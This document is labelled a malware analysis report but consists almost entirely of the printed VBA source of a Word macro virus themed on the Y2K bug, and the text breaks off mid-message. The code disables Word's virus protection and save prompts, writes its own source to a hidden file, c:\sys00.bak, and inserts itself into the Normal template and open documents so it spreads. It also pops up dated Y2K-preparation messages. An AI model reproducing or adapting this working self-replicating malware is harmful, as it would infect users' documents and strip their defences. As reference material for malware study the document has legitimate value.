Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'y2k
' Open Letter to the Virus Hunters
'
' This virus was written to help educate the
' public about the dangers of the approaching
' millennium bug. Please do not update your
' virus scanners to detect or clean this virus
' until after December 1, 1999.
'
' I know you won't do that, but what the heck.
'
' I tried.
'
' Bye!
'
On Error Resume Next

s = ActiveDocument.Saved

Application.EnableCancelKey = Not -1

With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With

Randomize

If Dir("c:\sys00.bak", 6) = "" Then
   Open "c:\sys00.bak" For Output As #1
   For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
      a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
      Print #1, a
      Next i
   Close #1
   SetAttr "c:\sys00.bak", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = ActiveDocument.VBProject.VBComponents.Item(1)
Else
   tf = ""
End If

If tf <> "" Then
   Open "c:\sys00.bak" For Input As #1
   If LOF(1) = 0 Then GoTo q
   i = 1
   Do While Not EOF(1)
      Line Input #1, a
      tf.CodeModule.InsertLines i, a
      i = i + 1
   Loop
q:
   Close #1
   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
   If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End If

dd = Day(Now): mm = Month(Now): yy = Year(Now)
hh = Hour(Now): mm = Minute(Now): ss = Second(Now)

' only display messages for 1999
If yy <> 1999 Then
   GoTo end_here
End If

' only display messages until after lunch
If hh > 12 Then
   GoTo end_here
End If

t$ = Chr(13) + Chr(13)

'april 1, 1999
If dd = 1 And mm = 4 Then
   Title$ = "Y2K! Spread the word"
   msg$ = "This is not an April fools joke. I wish it were! The year 2000 is fast approaching, and the word still needs to be spread about the implications and dangers of the millennium bug commonly referred to as the Y2K bug. The virus that has infected this word document was written to help spread the word about the Y2K bug, and educate you so you can prepare yourself and your family for Saturday January 1, 2000."
   msg$ = msg$ + t$ + "From today until January 1, 2000, on the first business day of each month, I will give you a lesson in Y2K preparation."
   msg$ = msg$ + t$ + "Spread the word. Knowledge is power!"
   MsgBox msg$, vbCritical, Title$
End If
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
If dd = 2 And mm = 7 Then
   Title$ = "Did you get the stove?"
   msg$ = "Last month I recommend purchasing a gas stove to help heat your home in the event that your supply of electricity, gas, or oil was interrupted. This month I would like to suggest that you purchase a portable generator and enough gas cans to store gas to power the generator. The generator can be used to power lighting and small electrical appliances should the power be disrupted."
   msg$ = msg$ + t$ + "That's it for this month. See you next month!"
   MsgBox msg$, vbCritical, Title$
End If

'August 2, 1999
If dd = 2 And mm = 8 Then
   Title$ = "Getting back to basics"
   msg$ = "In this installment, I would like to suggest that you consider purchasing candles, matches, flashlights, and batteries. These items will be invaluable during those cold, dark nights should the power companies fail in their Y2K conversion. Don't plan on relying on the banks or credit/debit cards. Start each month, and stash away enough money to last you at least 2 months. This money should include enough money to pay the rent/mortgage, utilities, FOOD, etc. Remember cold hard cash
... (truncated)